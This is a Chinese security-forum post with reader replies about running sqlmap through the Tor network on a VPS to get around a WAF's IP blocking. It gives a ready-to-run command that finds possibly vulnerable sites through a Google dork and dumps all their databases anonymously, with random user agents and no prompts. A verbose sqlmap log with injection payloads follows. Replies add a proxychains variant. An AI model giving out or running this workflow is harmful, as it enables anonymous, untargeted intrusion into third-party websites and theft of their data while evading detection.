用户
搜索
  • TA的每日心情
    奋斗
    2018-5-10 15:54
  • 签到天数: 102 天

    连续签到: 1 天

    [LV.6]常住居民II

    i春秋作家

    Rank: 7Rank: 7Rank: 7

    23

    主题

    71

    帖子

    1520

    魔法币
    收听
    0
    粉丝
    3
    注册时间
    2015-11-20

    i春秋签约作者

    发表于 2018-2-6 14:04:16 136974

    出门在外,保护自己

    事情起因

    话说前几个月前,有件事情很纠结,想着使用代理来绕下waf的IP限制,但是搜索了一番资料,并没有有用的收获,不过还是了解到了以下两种方案。
    1、代理IP池

    2、tor匿名网络

    接着呢自己开发能力太弱鸡,这件事就耽搁下来了,直到昨天才开始试试代理使用sqlmap。因为之前已经拥有了国外的vps,所以自然会选择使用Tor网络来试试,毕竟国内网络连接Tor会比较难受。然后呢就开始搜索资料,以下是经过整理后的记录。

    首先肯定是春秋啦,但是这个就。。。默默无闻,也许大佬都忙。

    好吧,还是自己动手吧。

    在代理环境下使用sqlmap

    目标

    使用 sqlmap 在代理(包括 tor)环境下进行注入。

    环境

    美国的小内存vps,ubuntu系统16.04。
    ubuntu系统 这里直接使用 apt-get install python 看是不是安装了python2.7版本。因为sqlmap只支持2,6 或2,7,自己使用最新的2.7.17源码包安装后出错,最后。。。。没法成功启动sqlmap。搜索了好久,也没啥解决方法,可能服务器都是RH系,debian系的少。

    安装

    首先安装一些必备的工具
    apt-get install git
    安装sqlmap
    git clone https://github.com/sqlmapproject/sqlmap.git
    注意:国内因为网络环境的原因,有时候连不上github.com的服务器。
    可以先到 http://sqlmap.org 下载,然后解压。
    clone 后,会生成一个sqlmap命名的文件夹。进入测试以下。
    root@ubuntu:/home/user/sqlmap# python sqlmap.py
    Usage: python sqlmap.py [options]

    sqlmap.py: error: missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, -x, --wizard, --update, --purge-output or --dependencies), use -h for basic or -hh for advanced help
    shutting down at 10:33:53

    安装 tor

    apt-get install tor
    敲入ss -l 看看是否已经监听9050端口
    State Recv-Q Send-Q Local Address:Port Peer Address:Port
    LISTEN 0 50 127.0.0.1:mysql :
    LISTEN 0 128 :::http :::
    LISTEN 0 128 :::ssh :::

    LISTEN 0 128 :ssh :
    LISTEN 0 128 127.0.0.1:9050
    :*

    测试是否可用

    curl http://ifconfig.me #显示你本身的ip
    curl --socks4a localhost:9050 http://ifconfig.me #显示代理后的ip
    使用

    使用代理

    发起攻击
    下面的命令将运行SQLMap用一些基本的设置使用Tor继续攻击者匿名,也完全自动化的选择可能脆弱的网站,使其在谷歌上搜索他们。
    攻击者将执行下列, 这里只是举个例子(重点来了,记笔记,先把tor的参数放在前面,别问我为啥):
    ./sqlmap.py --tor --tor-type=SOCKS5 -g "inurl:.php?id=1" --random-agent --dump-all --batch
    --time-sec=15

    --tor  使用Tor网络当连接到目标网站攻击

    --tor-type=SOCKS5  使用SOCKS5协议在使用Tor,那个更好比使用默认Tor匿名类型设置HTTP。

    -g "inurl:.php?id=1"
    谷歌搜索使用网站寻找潜在的脆弱。查看这在谷歌,输入inurl:. php ?id = 1到谷歌。
    (这里可以使用 -u 参数 后面加上注入点url即可)
    --random-agent  选择一个随机的用户代理,以便它看起来像一个web浏览器访问目标网站。一些网站不会回应是否提供了一个无效的用户代理。

    --dump-all  抓住所有表的所有信息。

    --batch  防止SQLMap停下来,你知道怎么做。使用所有默认方式。

    --time-secs  为了允许基于时间的sql注入。

    使用详情

    root@ubuntu:~/sqlmap# python sqlmap.py --tor --tor-type=SOCKS5 -u "xxxxxx" --batch -v 3  --random-agent
            ___
           __H__
     ___ ___[']_____ ___ ___  {1.2.1.25#dev}
    |_ -| . [']     | .'| . |
    |___|_  [)]_|_|_|__,|  _|
          |_|V          |_|   http://sqlmap.org
    
    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
     starting at 22:13:20
    
    [22:13:20] [DEBUG] cleaning up configuration parameters
    [22:13:20] [WARNING] increasing default value for option '--time-sec' to 10 because switch '--tor' was provided
    [22:13:20] [INFO] setting Tor SOCKS proxy settings
    [22:13:20] [DEBUG] setting the HTTP timeout
    [22:13:20] [DEBUG] loading random HTTP User-Agent header(s) from file '/root/sqlmap/txt/user-agents.txt'
    [22:13:20] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12' from file '/root/sqlmap/txt/user-agents.txt'
    [22:13:20] [DEBUG] creating HTTP requests opener object
    [22:13:20] [INFO] testing connection to the target URL
    [22:13:31] [DEBUG] declared web page charset 'gb2312'
    [22:13:31] [INFO] testing if the target URL content is stable
    [22:13:33] [INFO] target URL content is stable
    [22:13:33] [INFO] testing if GET parameter 'id' is dynamic
    [22:13:33] [PAYLOAD] 1874
    [22:13:35] [DEBUG] setting match ratio for current parameter to 0.886
    [22:13:35] [INFO] confirming that GET parameter 'id' is dynamic
    [22:13:35] [PAYLOAD] 6458
    [22:13:36] [INFO] GET parameter 'id' is dynamic
    [22:13:36] [PAYLOAD] 1,,(.'..()"
    [22:13:38] [PAYLOAD] 1466-1465
    [22:13:40] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable
    [22:13:40] [PAYLOAD] 1'BAZlZr<'">fCcPOa
    [22:13:41] [INFO] testing for SQL injection on GET parameter 'id'

    参考链接:
    http://bobao.360.cn/learning/detail/490.html
    https://navisec.it/%e5%9c%a8%e4%bb%a3%e7%90%86%e7%8e%af%e5%a2%83%e4%b8%8b%e4%bd%bf%e7%94%a8sqlmap/

    感谢分享
    使用道具 举报 回复
    为什么不在kali下使用sqlmap? 装tor、proxychains之后,启动tor,使用proxychains 监听本地9050端口,然后直接proxychains sqlmap -u "xxxxxx"就可以用了啊。。。
    使用道具 举报 回复
    不错,收藏备用,谢谢
    使用道具 举报 回复
    学习了。
    使用道具 举报 回复
    学习一波
    使用道具 举报 回复
    发表于 2018-2-7 10:01:23
    loveyou 发表于 2018-2-6 16:50
    为什么不在kali下使用sqlmap? 装tor、proxychains之后,启动tor,使用proxychains 监听本地9050端口,然后直 ...

    vps并没有带kali系统,哈哈。
    使用道具 举报 回复
    发表于 2018-2-7 15:31:39
    6666666666666key
    使用道具 举报 回复
    发表于 2018-2-7 16:29:08
    超实用的文章,感谢大佬分享
    使用道具 举报 回复
    发表于 2018-2-7 16:38:39
    感谢分享
    使用道具 举报 回复
    loveyou 发表于 2018-2-6 16:50
    为什么不在kali下使用sqlmap? 装tor、proxychains之后,启动tor,使用proxychains 监听本地9050端口,然后直 ...

    tor和proxychains是kali自带的,端口也配置好的,proxychains的默认端口就是tor的端口
    使用道具 举报 回复
    感谢大佬分享,学习了
    使用道具 举报 回复
    你可知道tor的延迟
    使用道具 举报 回复
    发表于 2018-3-13 08:49:58

    如果没办法有代理池,试试tor也可以
    使用道具 举报 回复
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册